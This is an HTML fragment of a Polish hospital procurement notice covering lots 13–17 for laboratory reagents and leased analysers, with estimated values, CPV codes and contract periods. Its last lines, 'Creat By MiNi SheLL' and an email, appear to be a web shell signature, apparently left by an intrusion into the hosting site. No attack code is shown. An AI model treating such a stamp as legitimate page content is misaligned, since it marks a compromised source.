<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Sukcesywne dostawy odczynników serologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia o łącznej wartości szacunkowej 11340,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy odczynników serologicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sukcesywne dostawy odczynników, kalibratorów, kontroli, materiałów zużywalnych i akcesoriów do wykonania 1300 rozdziałów elektroforetycznych białek surowicy krwi, zwanych dalej wyrobami wraz z  dzierżawą zautomatyzowanego systemu do rozdziału białek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łacznej wartości szacunkowej 13824,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne  dostawy odczynników, kalibratorów, kontroli, materiałów zużywalnych i akcesoriów do wykonania 1300 rozdziałów elektroforetycznych białek surowicy krwi, zwanych dalej wyrobami wraz z  dzierżawą zautomatyzowanego systemu do rozdziału białek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Sukcesywne dostawy odczynników, materiałów zużywalnych i akcesoriów do wykonania 36500 badań z zakresu immunologii transfuzjologicznej wraz z dzierżawą analizatora i oprogramowaniem i zestawem back -up.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 132 341,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy odczynników, materiałów zużywalnych i akcesoriów do wykonania  36 500 badań z zakresu immunologii transfuzjologicznej w tym:
 -  8 000  badań  oznaczeń grupy krwi,
-     500   badań  gruby krwi noworodków i antygenu RhD (dwa klony),
-     700  badań  BTA z poliwalentną surowicą antyglobulinową,
-   8 500  badań   screening p/ciał (PTA) z surowicą antyglobulinową, poliwalentną,
-      300  badań   screening p/ciał (PTA) z surowicą antyglobulinową IgG,
-   5 500  badań   grup krwi i antygenu RhD (VI- u biorców),
- 13 000  badań   właściwych prób zgodności

zwanych dalej wyrobami wraz z dzierżawą analizatora z oprogramowaniem i zestawem back-up (wirówka, pipeta, dispenser  i inkubator).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Sukcesywne dostawy  odczynników, materiałów zużywalnych i akcesoriów do wykonania 5 000 oznaczeń równowagi kwasowo-zasadowej (pH, pO2, pCO2)wraz z  dzierżawą analizatora gazometrycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łacznej wartości szacunkowej 16 200,00 PLN (zamówienie podstawowe i uzupełniajace) są sukcesywne dostawy  odczynników, materiałów zużywalnych i akcesoriów do wykonania 5 000 oznaczeń równowagi kwasowo-zasadowej (pH, pO2, pCO2)wraz z  dzierżawą analizatora gazometrycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Sukcesywne dostawy odczynników, standardów, materiałów zużywalnych i akcesoriów potrzebnych do wykonania 110 000 badań do oznaczania glukozy we krwi włośniczkowej wraz z dzierżawą analizatora glukozy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 85 320,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy odczynników, standardów, materiałów zużywalnych i akcesoriów potrzebnych do wykonania 110 000 badań do oznaczania glukozy we krwi włośniczkowej wraz z dzierżawą analizatora glukozy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com